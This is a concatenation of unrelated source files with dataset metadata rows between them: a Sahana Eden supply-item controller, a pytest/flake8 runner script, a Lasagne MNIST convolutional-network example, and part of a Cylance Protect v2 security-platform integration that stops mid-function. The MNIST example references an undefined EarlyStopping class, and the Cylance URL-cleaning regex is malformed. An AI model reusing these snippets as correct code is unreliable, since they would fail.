office = db(query).select(otable.id,
otable.comments,
limitby=(0, 1)).first()
if office:
if current.request.extension in ("xls", "pdf"):
if office.comments:
return office.comments
else:
return default
elif office.comments:
comments = s3_comments_represent(office.comments,
show_link=False)
else:
comments = default
return A(comments,
_href = URL(f="office", args = [office.id]))
else:
return default
# -------------------------------------------------------------------------
def supply_item_entity_status(row):
""" Virtual field: status """
if hasattr(row, "supply_item_entity"):
row = row.supply_item_entity
else:
return None
db = current.db
s3db = current.s3db
etable = s3db.supply_item_entity
ekey = etable._id.name
try:
instance_type = row.instance_type
except AttributeError:
return None
try:
entity_id = row[ekey]
except AttributeError:
return None
itable = s3db[instance_type]
status = None
if instance_type == "inv_inv_item":
query = (itable[ekey] == entity_id)
record = current.db(query).select(itable.expiry_date,
limitby=(0, 1)).first()
if record:
T = current.T
if record.expiry_date:
status = T("Stock Expires %(date)s") % \
dict(date=record.expiry_date)
else:
status = T("In Stock")
elif instance_type == "proc_plan_item":
rtable = s3db.proc_plan
query = (itable[ekey] == entity_id) & \
(rtable.id == itable.plan_id)
record = current.db(query).select(rtable.eta,
limitby=(0, 1)).first()
if record:
T = current.T
if record.eta:
status = T("Planned %(date)s") % dict(date=record.eta)
else:
status = T("Planned Procurement")
elif instance_type == "inv_track_item":
rtable = s3db.inv_recv
query = (itable[ekey] == entity_id) & \
(rtable.id == itable.send_inv_item_id)
record = current.db(query).select(rtable.eta,
limitby=(0, 1)).first()
if record:
T = current.T
if record.eta:
status = T("Order Due %(date)s") % dict(date=record.eta)
else:
status = T("On Order")
else:
# @ToDo: Assets and req_items
return current.messages["NONE"]
return status or current.messages["NONE"]
# =============================================================================
def supply_item_controller():
""" RESTful CRUD controller """
s3 = current.response.s3
s3db = current.s3db
def prep(r):
if r.component:
if r.component_name == "inv_item":
# Inventory Items need proper accountability so are edited through inv_adj
s3db.configure("inv_inv_item",
listadd=False,
deletable=False)
# Filter to just item packs for this Item
inv_item_pack_requires = IS_ONE_OF(current.db,
"supply_item_pack.id",
s3db.supply_item_pack_represent,
sort=True,
filterby = "item_id",
filter_opts = (r.record.id,),
)
s3db.inv_inv_item.item_pack_id.requires = inv_item_pack_requires
elif r.component_name == "req_item":
# This is a report not a workflow
s3db.configure("req_req_item",
listadd=False,
deletable=False)
# Needs better workflow as no way to add the Kit Items
# else:
# caller = current.request.get_vars.get("caller", None)
# if caller == "inv_kit_item_id":
# field = r.table.kit
# field.default = True
# field.readable = field.writable = False
elif r.representation == "xls":
# Use full Category names in XLS output
s3db.supply_item.item_category_id.represent = \
supply_ItemCategoryRepresent(use_code=False)
return True
s3.prep = prep
return current.rest_controller("supply", "item",
rheader = supply_item_rheader,
)
# =============================================================================
def supply_item_entity_controller():
"""
RESTful CRUD controller
- consolidated report of inv_item, recv_item & proc_plan_item
@ToDo: Migrate JS to Static as part of migrating this to an
S3Search Widget
"""
T = current.T
db = current.db
s3db = current.s3db
s3 = current.response.s3
settings = current.deployment_settings
tablename = "supply_item_entity"
table = s3db[tablename]
# CRUD strings
s3.crud_strings[tablename] = Storage(
label_create = T("Add Item"),
title_display = T("Item Details"),
title_list = T("Items"),
title_update = T("Edit Item"),
label_list_button = T("List Items"),
label_delete_button = T("Delete Item"),
msg_record_created = T("Item added"),
msg_record_modified = T("Item updated"),
msg_record_deleted = T("Item deleted"),
msg_list_empty = T("No Items currently registered"))
table.category = Field.Method("category",
supply_item_entity_category)
table.country = Field.Method("country",
supply_item_entity_country)
table.organisation = Field.Method("organisation",
supply_item_entity_organisation)
table.contacts = Field.Method("contacts",
supply_item_entity_contacts)
table.status = Field.Method("status",
supply_item_entity_status)
# Allow VirtualFields to be sortable/searchable
s3.no_sspag = True
s3db.configure(tablename,
deletable = False,
insertable = False,
# @ToDo: Allow VirtualFields to be used to Group Reports
#report_groupby = "category",
list_fields = [(T("Category"), "category"),
"item_id",
"quantity",
(T("Unit of Measure"), "item_pack_id"),
(T("Status"), "status"),
(current.messages.COUNTRY, "country"),
(T("Organization"), "organisation"),
#(T("Office"), "site"),
(T("Contacts"), "contacts"),
],
extra_fields = ["instance_type"],
)
def postp(r, output):
if r.interactive and not r.record:
# Provide some manual Filters above the list
rheader = DIV()
# Filter by Category
table = s3db.supply_item_category
etable = s3db.supply_item_entity
itable = s3db.supply_item
query = (etable.deleted == False) & \
(etable.item_id == itable.id) & \
(itable.item_category_id == table.id)
categories = db(query).select(table.id,
table.name,
distinct=True)
select = SELECT(_multiple="multiple", _id="category_dropdown")
for category in categories:
select.append(OPTION(category.name, _name=category.id))
rheader.append(DIV(B("%s:" % T("Filter by Category")),
BR(),
select,
_class="rfilter"))
# Filter by Status
select = SELECT(_multiple="multiple", _id="status_dropdown")
if settings.has_module("inv"):
select.append(OPTION(T("In Stock")))
select.append(OPTION(T("On Order")))
if settings.has_module("proc"):
select.append(OPTION(T("Planned Procurement")))
rheader.append(DIV(B("%s:" % T("Filter by Status")),
BR(),
select,
_class="rfilter"))
output["rheader"] = rheader
# Find Offices with Items
# @ToDo: Other Site types (how to do this as a big Join?)
table = s3db.org_office
otable = s3db.org_organisation
ltable = s3db.gis_location
fields = [ltable.L0,
#table.name,
otable.name]
query = (table.deleted == False) & \
(table.organisation_id == otable.id) & \
(ltable.id == table.location_id)
isites = []
rsites = []
psites = []
# @ToDo: Assets & Req_Items
# @ToDo: Try to do this as a Join?
if settings.has_module("inv"):
inv_itable = s3db.inv_inv_item
iquery = query & (inv_itable.site_id == table.site_id)
isites = db(iquery).select(distinct=True, *fields)
inv_ttable = s3db.inv_track_item
inv_rtable = s3db.inv_recv
rquery = query & (inv_ttable.send_inv_item_id == inv_rtable.id) & \
(inv_rtable.site_id == table.site_id)
rsites = db(rquery).select(distinct=True, *fields)
if settings.has_module("proc"):
proc_ptable = s3db.proc_plan
proc_itable = s3db.proc_plan_item
pquery = query & (proc_itable.plan_id == proc_ptable.id) & \
(proc_ptable.site_id == table.site_id)
psites = db(pquery).select(distinct=True, *fields)
sites = []
for site in isites:
if site not in sites:
sites.append(site)
for site in rsites:
if site not in sites:
sites.append(site)
for site in psites:
if site not in sites:
sites.append(site)
# Filter by Country
select = SELECT(_multiple="multiple", _id="country_dropdown")
countries = []
for site in sites:
country = site.org_office.L0
if country not in countries:
select.append(OPTION(country or T("Unknown")))
countries.append(country)
rheader.append(DIV(B("%s:" % T("Filter by Country")),
BR(),
select,
_class="rfilter"))
# Filter by Organisation
select = SELECT(_multiple="multiple", _id="organisation_dropdown")
orgs = []
for site in sites:
org = site.org_organisation.name
if org not in orgs:
select.append(OPTION(org or T("Unknown")))
orgs.append(org)
rheader.append(DIV(B("%s:" % T("Filter by Organization")),
BR(),
select,
_class="rfilter"))
# http://datatables.net/api#fnFilter
# Columns:
# 1 = Category
# 5 = Status (@ToDo: Assets & Req Items)
# 6 = Country
# 7 = Organisation
# Clear column filter before applying new one
#
# @ToDo: Hide options which are no longer relevant because
# of the other filters applied
#
s3.jquery_ready.append('''
function filterColumns(){
var oTable=$('#list').dataTable()
var values=''
$('#category_dropdown option:selected').each(function(){
values+=$(this).text()+'|'
})
var regex=(values==''?'':'^'+values.slice(0, -1)+'$')
oTable.fnFilter('',1,false)
oTable.fnFilter(regex,1,true,false)
values=''
$('#status_dropdown option:selected').each(function(){
if($(this).text()=="''' + T("On Order") + '''"){
values+=$(this).text()+'|'+"''' + T("Order") + '''.*"+'|'
}else if($(this).text()=="''' + T("Planned Procurement") + '''"){
values+="''' + T("Planned") + '''.*"+'|'
}else{
values+=$(this).text()+'|'+"''' + T("Stock") + '''.*"+'|'
}
})
var regex=(values==''?'':'^'+values.slice(0,-1)+'$')
oTable.fnFilter('',5,false)
oTable.fnFilter(regex,5,true,false)
values=''
$('#country_dropdown option:selected').each(function(){
values+=$(this).text()+'|'
})
var regex=(values==''?'':'^'+values.slice(0,-1)+'$')
oTable.fnFilter('',6,false)
oTable.fnFilter(regex,6,true,false)
values=''
$('#organisation_dropdown option:selected').each(function(){
values+=$(this).text()+'|'
})
var regex=(values==''? '':'^'+values.slice(0,-1)+'$')
oTable.fnFilter('',7,false)
oTable.fnFilter(regex,7,true,false)
}
$('#category_dropdown').change(function(){
filterColumns()
var values=[]
$('#category_dropdown option:selected').each(function(){
values.push($(this).attr('name'))
})
if(values.length){
$('#list_formats a').attr('href',function(){
var href=this.href.split('?')[0]+'?item_entity.item_id$item_category_id='+values[0]
for(i=1;i<=(values.length-1);i++){
href=href+','+values[i]
}
return href
})
}else{
$('#list_formats a').attr('href',function(){
return this.href.split('?')[0]
})
}
})
$('#status_dropdown').change(function(){
filterColumns()
})
$('#country_dropdown').change(function(){
filterColumns()
})
$('#organisation_dropdown').change(function(){
filterColumns()
})''')
return output
s3.postp = postp
output = current.rest_controller("supply", "item_entity",
hide_filter = True,
)
return output
# -------------------------------------------------------------------------
def supply_get_shipping_code(type, site_id, field):
db = current.db
if site_id:
table = current.s3db.org_site
site = db(table.site_id == site_id).select(table.code,
limitby=(0, 1)
).first()
if site:
scode = site.code
else:
scode = "###"
code = "%s-%s-" % (type, scode)
else:
code = "%s-###-" % (type)
number = 0
if field:
query = (field.like("%s%%" % code))
ref_row = db(query).select(field,
limitby=(0, 1),
orderby=~field).first()
if ref_row:
ref = ref_row(field)
number = int(ref[-6:])
return "%s%06d" % (code, number + 1)
# END =========================================================================
| mit | 6,612,580,975,636,968,000 | 38.39402 | 161 | 0.433469 | false |
alanjds/pyukpostcode | runtests.py | 1 | 2422 | #! /usr/bin/env python
from __future__ import print_function
import pytest
import sys
import os
import subprocess
PYTEST_ARGS = {
'default': ['tests', '--cov=ukpostcode'],
'fast': ['tests', '-q', '--cov=ukpostcode'],
}
FLAKE8_ARGS = ['ukpostcode', 'tests', '--ignore=E501', '--ignore=E262', '--max-line-length=120']
sys.path.append(os.path.dirname(__file__))
def exit_on_failure(ret, message=None):
if ret:
sys.exit(ret)
def flake8_main(args):
print('Running flake8 code linting')
ret = subprocess.call(['flake8'] + args)
print('flake8 failed' if ret else 'flake8 passed')
return ret
def split_class_and_function(string):
class_string, function_string = string.split('.', 1)
return "%s and %s" % (class_string, function_string)
def is_function(string):
# `True` if it looks like a test function is included in the string.
return string.startswith('test_') or '.test_' in string
def is_class(string):
# `True` if first character is uppercase - assume it's a class name.
return string[0] == string[0].upper()
if __name__ == "__main__":
try:
sys.argv.remove('--nolint')
except ValueError:
run_flake8 = True
else:
run_flake8 = False
try:
sys.argv.remove('--lintonly')
except ValueError:
run_tests = True
else:
run_tests = False
try:
sys.argv.remove('--fast')
except ValueError:
style = 'default'
else:
style = 'fast'
run_flake8 = False
if len(sys.argv) > 1:
pytest_args = sys.argv[1:]
first_arg = pytest_args[0]
if first_arg.startswith('-'):
# `runtests.py [flags]`
pytest_args = ['tests'] + pytest_args
elif is_class(first_arg) and is_function(first_arg):
# `runtests.py TestCase.test_function [flags]`
expression = split_class_and_function(first_arg)
pytest_args = ['tests', '-k', expression] + pytest_args[1:]
elif is_class(first_arg) or is_function(first_arg):
# `runtests.py TestCase [flags]`
# `runtests.py test_function [flags]`
pytest_args = ['tests', '-k', pytest_args[0]] + pytest_args[1:]
else:
pytest_args = PYTEST_ARGS[style]
if run_tests:
exit_on_failure(pytest.main(pytest_args))
if run_flake8:
exit_on_failure(flake8_main(FLAKE8_ARGS))
| apache-2.0 | -7,299,852,809,777,010,000 | 25.615385 | 96 | 0.592073 | false |
trenton3983/Artificial_Intelligence_for_Humans | vol3/vol3-python-examples/examples/example_mnist_conv.py | 1 | 2549 | #!/usr/bin/env python
"""
Artificial Intelligence for Humans
Volume 3: Deep Learning and Neural Networks
Python Version
http://www.aifh.org
http://www.jeffheaton.com
Code repository:
https://github.com/jeffheaton/aifh
Copyright 2015 by Jeff Heaton
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
For more information on Heaton Research copyrights, licenses
and trademarks visit:
http://www.heatonresearch.com/copyright
"""
import lasagne
from lib.aifh.mnist import *
import theano
import theano.tensor as T
import time
import types
from lasagne.layers import DenseLayer
from lasagne.layers import InputLayer
from lasagne.nonlinearities import sigmoid
from lasagne.nonlinearities import softmax
from lasagne.nonlinearities import rectify
from lasagne.updates import nesterov_momentum
from nolearn.lasagne import NeuralNet
from lasagne.layers import Conv2DLayer
layers0 = [('input', InputLayer),
('conv0', Conv2DLayer),
('dense0', DenseLayer),
('output', DenseLayer)]
net0 = NeuralNet(layers=layers0,
input_shape=(None, 1, 28, 28),
conv0_num_filters=32,
conv0_filter_size=(5, 5),
conv0_nonlinearity=lasagne.nonlinearities.rectify,
dense0_num_units=1000,
dense0_nonlinearity = rectify,
output_num_units=10,
output_nonlinearity=softmax,
update=nesterov_momentum,
update_learning_rate=0.1,
update_momentum=0.9,
regression=False,
on_epoch_finished=[
EarlyStopping(patience=5)
],
verbose=1,
max_epochs=100)
X_train, y_train, X_val, y_val, X_test, y_test = load_dataset(True)
def my_split(self, X, y, eval_size):
return X_train,X_val,y_train,y_val
net0.train_test_split = types.MethodType(my_split, net0)
net0.fit(X_train, y_train)
y_predict = net0.predict(X_val)
count = 0
wrong = 0
for element in zip(X_val,y_val,y_predict):
if element[1] != element[2]:
wrong = wrong + 1
count = count + 1
print("Incorrect {}/{} ({}%)".format(wrong,count,(wrong/count)*100))
| apache-2.0 | -293,695,254,517,834,240 | 28.988235 | 76 | 0.708513 | false |
demisto/content | Packs/Cylance_Protect/Integrations/Cylance_Protect_v2/Cylance_Protect_v2.py | 1 | 50344 | from CommonServerPython import *
import jwt
import uuid
import requests
import json
import re
import zipfile
from StringIO import StringIO
from datetime import datetime, timedelta
# disable insecure warnings
requests.packages.urllib3.disable_warnings()
# CONSTANTS
TOKEN_TIMEOUT = 300 # 5 minutes
URI_AUTH = 'auth/v2/token'
URI_DEVICES = 'devices/v2'
URI_POLICIES = 'policies/v2'
URI_ZONES = 'zones/v2'
URI_THREATS = 'threats/v2'
URI_LISTS = 'globallists/v2'
SCOPE_DEVICE_LIST = 'device:list'
SCOPE_DEVICE_READ = 'device:read'
SCOPE_DEVICE_UPDATE = 'device:update'
SCOPE_DEVICE_THREAT_LIST = 'device:threatlist'
SCOPE_POLICY_LIST = 'policy:list'
SCOPE_POLICY_READ = 'policy:read'
SCOPE_ZONE_CREATE = 'zone:create'
SCOPE_ZONE_LIST = 'zone:list'
SCOPE_ZONE_READ = 'zone:read'
SCOPE_ZONE_UPDATE = 'zone:update'
SCOPE_THREAT_READ = 'threat:read'
SCOPE_THREAT_DEVICE_LIST = 'threat:devicelist'
SCOPE_THREAT_UPDATE = 'threat:update'
SCOPE_GLOBAL_LIST = 'globallist:list'
SCOPE_THREAT_LIST = 'threat:list'
SCOPE_GLOBAL_LIST_CREATE = 'globallist:create'
SCOPE_GLOBAL_LIST_DELETE = 'globallist:delete'
# PREREQUISITES
def load_server_url():
""" Cleans and loads the server url from the configuration """
url = demisto.params()['server']
url = re.sub('/[\/]+$/', '', url)
url = re.sub('\/$', '', url)
return url
# GLOBALS
APP_ID = demisto.params()['app_id']
APP_SECRET = demisto.params()['app_secret']
TID = demisto.params()['tid']
SERVER_URL = load_server_url()
FILE_THRESHOLD = demisto.params()['file_threshold']
USE_SSL = not demisto.params().get('unsecure', False)
# HELPERS
def generate_jwt_times():
"""
Generates the epoch time window in which the token will be valid
Returns the current timestamp and the timeout timestamp (in that order)
"""
now = datetime.utcnow()
timeout_datetime = now + timedelta(seconds=TOKEN_TIMEOUT)
epoch_time = int((now - datetime(1970, 1, 1)).total_seconds())
epoch_timeout = int((timeout_datetime - datetime(1970, 1, 1)).total_seconds())
return epoch_time, epoch_timeout
def api_call(uri, method='post', headers={}, body={}, params={}, accept_404=False):
"""
Makes an API call to the server URL with the supplied uri, method, headers, body and params
"""
url = '%s/%s' % (SERVER_URL, uri)
res = requests.request(method, url, headers=headers, data=json.dumps(body), params=params, verify=USE_SSL)
if res.status_code < 200 or res.status_code >= 300:
if res.status_code == 409 and str(res.content).find('already an entry for this threat') != -1:
raise Warning(res.content)
if not res.status_code == 404 and not accept_404:
return_error(
'Got status code ' + str(res.status_code) + ' with body ' + res.content + ' with headers ' + str(
res.headers))
return json.loads(res.text) if res.text else res.ok
def get_authentication_token(scope=None):
"""
Generates a JWT authorization token with an optional scope and queries the API for an access token
Returns the received API access token
"""
# Generate token ID
token_id = str(uuid.uuid4())
# Generate current time & token timeout
epoch_time, epoch_timeout = generate_jwt_times()
# Token claims
claims = {
'exp': epoch_timeout,
'iat': epoch_time,
'iss': 'http://cylance.com',
'sub': APP_ID,
'tid': TID,
'jti': token_id
}
if scope:
claims['scp'] = scope
# Encode the token
encoded = jwt.encode(claims, APP_SECRET, algorithm='HS256')
payload = {'auth_token': encoded}
headers = {'Content-Type': 'application/json; charset=utf-8'}
res = api_call(method='post', uri=URI_AUTH, body=payload, headers=headers)
return res['access_token']
def threat_to_incident(threat):
incident = {
'name': 'Cylance Protect v2 threat ' + threat['name'],
'occurred': threat['last_found'] + 'Z',
'rawJSON': json.dumps(threat)
}
host_name = None
devices = get_threat_devices_request(threat['sha256'], None, None)['page_items']
for device in devices:
if device['date_found'] == threat['last_found']:
host_name = device['name']
labels = [{'type': 'Classification', 'value': threat['classification']}, {'type': 'MD5', 'value': threat['md5']},
{'type': 'SHA256', 'value': threat['sha256']}, {'type': 'ThreatLastFound', 'value': threat['last_found']},
{'type': 'HostName', 'value': host_name}]
incident['labels'] = labels
return incident
def normalize_score(score):
"""
Translates API raw float (-1 to 1) score to UI score (-100 to 100)
"""
return score * 100
def translate_score(score, threshold):
if score > 0:
dbot_score = 1
elif threshold <= score:
dbot_score = 2
else:
dbot_score = 3
return dbot_score
# FUNCTIONS
def test():
access_token = get_authentication_token()
if not access_token:
raise Exception('Unable to get access token')
demisto.results('ok')
def get_devices():
page = demisto.args()['pageNumber'] if 'pageNumber' in demisto.args() else None
page_size = demisto.args()['pageSize'] if 'pageSize' in demisto.args() else None
result = get_devices_request(page, page_size)
devices = result['page_items']
hr = []
devices_context = []
endpoint_context = []
for device in devices:
current_device_context = {
'AgentVersion': device['agent_version'],
'DateFirstRegistered': device['date_first_registered'],
'ID': device['id'],
'IPAddress': device['ip_addresses'],
'MACAdress': device['mac_addresses'],
'Hostname': device['name'],
'State': device['state']
}
if device['policy']:
policy = {}
if device['policy']['id']:
policy['ID'] = device['policy']['id']
if device['policy']['name']:
policy['Name'] = device['policy']['name']
if policy:
current_device_context['Policy'] = policy
devices_context.append(current_device_context)
endpoint_context.append({
'IPAddress': device['ip_addresses'],
'MACAdress': device['mac_addresses'],
'Hostname': device['name']
})
current_device = dict(device)
current_device['ip_addresses'] = ', '.join(current_device['ip_addresses'])
current_device['mac_addresses'] = ', '.join(current_device['mac_addresses'])
current_device['policy'] = current_device['policy']['name']
hr.append(current_device)
ec = {
'CylanceProtect.Device(val.ID && val.ID === obj.ID)': devices_context,
'Endpoint(val.Hostname && val.Hostname === obj.Hostname)': endpoint_context
}
entry = {
'Type': entryTypes['note'],
'Contents': devices,
'ContentsFormat': formats['json'],
'ReadableContentsFormat': formats['markdown'],
'HumanReadable': tableToMarkdown('Cylance Protect Devices', hr, headerTransform=underscoreToCamelCase,
removeNull=True),
'EntryContext': ec
}
demisto.results(entry)
def get_devices_request(page=None, page_size=None):
access_token = get_authentication_token(scope=SCOPE_DEVICE_LIST)
headers = {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + access_token
}
params = {}
if page:
params['page'] = page
if page_size:
params['page_size'] = page_size
res = api_call(uri=URI_DEVICES, method='get', headers=headers, params=params)
return res
def get_device():
device_id = demisto.args()['id']
device = get_device_request(device_id)
hr = []
if device:
device_context = {
'IPAddress': device['ip_addresses'],
'MACAdress': device['mac_addresses'],
'Hostname': device['host_name'],
'OSVersion': device['os_version'],
'UpdateAvailable': device['update_available'],
'BackgroundDetection': device['background_detection'],
'DateFirstRegistered': device['date_first_registered'],
'DateLastModified': device['date_last_modified'],
'DateOffline': device['date_offline'],
'IsSafe': device['is_safe'],
'LastLoggedInUser': device['last_logged_in_user'],
'State': device['state'],
'ID': device['id'],
'Name': device['name']
}
if device['update_type']:
device_context['UpdateType'] = device['update_type']
if device['policy']:
policy = {}
if device['policy']['id']:
policy['ID'] = device['policy']['id']
if device['policy']['name']:
policy['Name'] = device['policy']['name']
if policy:
device_context['Policy'] = policy
endpoint_context = {
'IPAddress': device['ip_addresses'],
'MACAdress': device['mac_addresses'],
'Hostname': device['host_name'],
'OSVersion': device['os_version']
}
ec = {
'Endpoint(val.Hostname && val.Hostname === obj.Hostname)': endpoint_context,
'CylanceProtect.Device(val.ID && val.ID === obj.ID)': device_context
}
current_device = dict(device)
current_device['ip_addresses'] = ', '.join(current_device['ip_addresses'])
current_device['mac_addresses'] = ', '.join(current_device['mac_addresses'])
current_device['policy'] = current_device['policy']['name']
hr.append(current_device)
else:
ec = {}
title = 'Cylance Protect Device ' + device_id
entry = {
'Type': entryTypes['note'],
'Contents': device,
'ContentsFormat': formats['json'],
'ReadableContentsFormat': formats['markdown'],
'HumanReadable': tableToMarkdown(title, hr, headerTransform=underscoreToCamelCase, removeNull=True),
'EntryContext': ec
}
demisto.results(entry)
def get_device_request(device_id):
access_token = get_authentication_token(scope=SCOPE_DEVICE_READ)
headers = {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + access_token
}
uri = '%s/%s' % (URI_DEVICES, device_id)
res = api_call(uri=uri, method='get', headers=headers)
return res
def update_device():
device_id = demisto.args()['id']
name = demisto.args()['name'] if 'name' in demisto.args() else None
policy_id = demisto.args()['policyId'] if 'policyId' in demisto.args() else None
add_zones = demisto.args()['addZones'] if 'addZones' in demisto.args() else None
remove_zones = demisto.args()['removeZones'] if 'removeZones' in demisto.args() else None
update_device_request(device_id, name, policy_id, add_zones, remove_zones)
hr = {}
if name:
hr['Name'] = name
if policy_id:
hr['PolicyID'] = policy_id
if add_zones:
hr['AddedZones'] = add_zones
if remove_zones:
hr['RemovedZones'] = remove_zones
device = hr.copy()
device['id'] = device_id
title = 'Device ' + device_id + ' was updated successfully.'
entry = {
'Type': entryTypes['note'],
'Contents': device,
'ContentsFormat': formats['json'],
'ReadableContentsFormat': formats['markdown'],
'HumanReadable': tableToMarkdown(title, [hr])
}
demisto.results(entry)
def update_device_request(device_id, name=None, policy_id=None, add_zones=None, remove_zones=None):
access_token = get_authentication_token(scope=SCOPE_DEVICE_UPDATE)
headers = {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + access_token
}
body = {}
if name:
body['name'] = name
if policy_id:
body['policy_id'] = policy_id
if add_zones:
body['add_zone_ids'] = [add_zones]
if remove_zones:
body['remove_zone_ids'] = [remove_zones]
# Do we have anything to update?
if not body:
raise Exception('No changes detected')
uri = '%s/%s' % (URI_DEVICES, device_id)
res = api_call(uri=uri, method='put', headers=headers, body=body)
return res
def get_device_threats():
device_id = demisto.args()['id']
page = demisto.args()['pageNumber'] if 'pageNumber' in demisto.args() else None
page_size = demisto.args()['pageSize'] if 'pageSize' in demisto.args() else None
device_threats = get_device_threats_request(device_id, page, page_size)['page_items']
dbot_score_array = []
for threat in device_threats:
dbot_score = 0
score = threat.get('cylance_score', None)
if score:
threat['cylance_score'] = normalize_score(threat['cylance_score'])
threshold = demisto.args().get('threshold', FILE_THRESHOLD)
dbot_score = translate_score(threat['cylance_score'], int(threshold))
dbot_score_array.append({
'Indicator': threat.get('sha256'),
'Type': 'file',
'Vendor': 'Cylance Protect',
'Score': dbot_score
})
if device_threats:
threats_context = createContext(data=device_threats, keyTransform=underscoreToCamelCase)
threats_context = add_capitalized_hash_to_context(threats_context)
ec = {
'File': threats_context,
'DBotScore': dbot_score_array
}
title = 'Cylance Protect Device Threat ' + device_id
demisto.results({
'Type': entryTypes['note'],
'Contents': device_threats,
'ContentsFormat': formats['json'],
'ReadableContentsFormat': formats['markdown'],
'HumanReadable': tableToMarkdown(title, device_threats, headerTransform=underscoreToCamelCase),
'EntryContext': ec
})
else:
demisto.results('No threats found.')
def get_device_threats_request(device_id, page=None, page_size=None):
access_token = get_authentication_token(scope=SCOPE_DEVICE_THREAT_LIST)
headers = {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + access_token
}
params = {}
if page:
params['page'] = page
if page_size:
params['page_size'] = page_size
uri = '%s/%s/threats' % (URI_DEVICES, device_id)
res = api_call(uri=uri, method='get', headers=headers, params=params)
return res
def get_policies():
page = demisto.args()['pageNumber'] if 'pageNumber' in demisto.args() else None
page_size = demisto.args()['pageSize'] if 'pageSize' in demisto.args() else None
policies = get_policies_request(page, page_size)['page_items']
context_policies = createContext(data=policies, keyTransform=underscoreToCamelCase)
ec = {
'CylanceProtect.Policies(val.id && val.id === obj.id)': context_policies
}
title = 'Cylance Protect Policies'
entry = {
'Type': entryTypes['note'],
'Contents': policies,
'ContentsFormat': formats['json'],
'ReadableContentsFormat': formats['markdown'],
'HumanReadable': tableToMarkdown(title, policies, headerTransform=underscoreToCamelCase),
'EntryContext': ec
}
demisto.results(entry)
def get_policies_request(page=None, page_size=None):
access_token = get_authentication_token(scope=SCOPE_POLICY_LIST)
headers = {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + access_token
}
params = {}
if page:
params['page'] = page
if page_size:
params['page_size'] = page_size
res = api_call(uri=URI_POLICIES, method='get', headers=headers, params=params)
return res
def create_zone():
name = demisto.args()['name']
policy_id = demisto.args()['policy_id']
criticality = demisto.args()['criticality']
zone = create_zone_request(name, policy_id, criticality)
title = 'Zone ' + name + ' was created successfully.'
demisto.results({
'Type': entryTypes['note'],
'Contents': zone,
'ContentsFormat': formats['json'],
'ReadableContentsFormat': formats['markdown'],
'HumanReadable': tableToMarkdown(title, [zone], headerTransform=underscoreToCamelCase)
})
def create_zone_request(name, policy_id, criticality):
access_token = get_authentication_token(scope=SCOPE_ZONE_CREATE)
headers = {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + access_token
}
body = {
'name': name,
'policy_id': policy_id,
'criticality': criticality
}
res = api_call(uri=URI_ZONES, method='post', headers=headers, body=body)
return res
def get_zones():
page = demisto.args()['pageNumber'] if 'pageNumber' in demisto.args() else None
page_size = demisto.args()['pageSize'] if 'pageSize' in demisto.args() else None
zones = get_zones_request(page, page_size)['page_items']
context_zones = createContext(data=zones, keyTransform=underscoreToCamelCase, removeNull=True)
ec = {
'CylanceProtect.Zones(val.Id && val.Id === obj.Id)': context_zones
}
title = 'Cylance Protect Zones'
demisto.results({
'Type': entryTypes['note'],
'Contents': zones,
'ContentsFormat': formats['json'],
'ReadableContentsFormat': formats['markdown'],
'HumanReadable': tableToMarkdown(title, zones, headerTransform=underscoreToCamelCase, removeNull=True),
'EntryContext': ec
})
def get_zones_request(page=None, page_size=None):
access_token = get_authentication_token(scope=SCOPE_ZONE_LIST)
headers = {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + access_token
}
params = {}
if page:
params['page'] = page
if page_size:
params['page_size'] = page_size
res = api_call(uri=URI_ZONES, method='get', headers=headers, params=params)
return res
def get_zone():
zone_id = demisto.args()['id']
zone = get_zone_request(zone_id)
context_zone = createContext(data=zone, keyTransform=underscoreToCamelCase, removeNull=True)
ec = {
'CylanceProtect.Zones(val.Id && val.Id === obj.Id)': context_zone
}
title = 'Cylance Protect Zone ' + zone_id
demisto.results({
'Type': entryTypes['note'],
'Contents': zone,
'ContentsFormat': formats['json'],
'ReadableContentsFormat': formats['markdown'],
'HumanReadable': tableToMarkdown(title, zone, headerTransform=underscoreToCamelCase, removeNull=True),
'EntryContext': ec
})
def get_zone_request(zone_id):
access_token = get_authentication_token(scope=SCOPE_ZONE_READ)
headers = {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + access_token
}
uri = '%s/%s' % (URI_ZONES, zone_id)
res = api_call(uri=uri, method='get', headers=headers)
return res
def update_zone():
zone_id = demisto.args()['id']
# Get current zone and fill in requires missing arguments
current_zone = get_zone_request(zone_id)
# Details to update
name = demisto.args()['name'] if 'name' in demisto.args() else current_zone['name']
policy_id = demisto.args()['policy_id'] if 'policy_id' in demisto.args() else current_zone['policy_id']
criticality = demisto.args()['criticality'] if 'criticality' in demisto.args() else current_zone['criticality']
zone = update_zone_request(zone_id, name, policy_id, criticality)
hr = {}
if name:
hr['Name'] = name
if policy_id:
hr['PolicyID'] = policy_id
if criticality:
hr['Criticality'] = criticality
title = 'Zone was updated successfully.'
demisto.results({
'Type': entryTypes['note'],
'Contents': zone,
'ContentsFormat': formats['json'],
'ReadableContentsFormat': formats['markdown'],
'HumanReadable': tableToMarkdown(title, [hr])
})
def update_zone_request(zone_id, name, policy_id, criticality):
access_token = get_authentication_token(scope=SCOPE_ZONE_UPDATE)
headers = {
'Content-Type': 'application/json',
'Authorization': 'Bearer ' + access_token
}
body = {}
if name:
body['name'] = name
if policy_id:
body['policy_id'] = policy_id
if criticality:
body['criticality'] = criticality
# Do we have anything to update?
if not body:
raise Exception('No changes detected')
uri = '%s/%s' % (URI_ZONES, zone_id)
res = api_call(uri=uri, method='put', headers=headers, body=body)
return res
def get_threat():
sha256 = demisto.args().get('sha256')
threat = get_threat_request(sha256)
if threat:
dbot_score = 0
score = threat.get('cylance_score', None)
if score:
threat['cylance_score'] = normalize_score(threat['cylance_score'])
threshold = demisto.args().get('threshold', FILE_THRESHOLD)
dbot_score = translate_score(threat['cylance_score'], int(threshold))
context_threat = createContext(data=threat, keyTransform=underscoreToCamelCase, removeNull=True)
context_threat = add_capitalized_hash_to_context(context_threat)
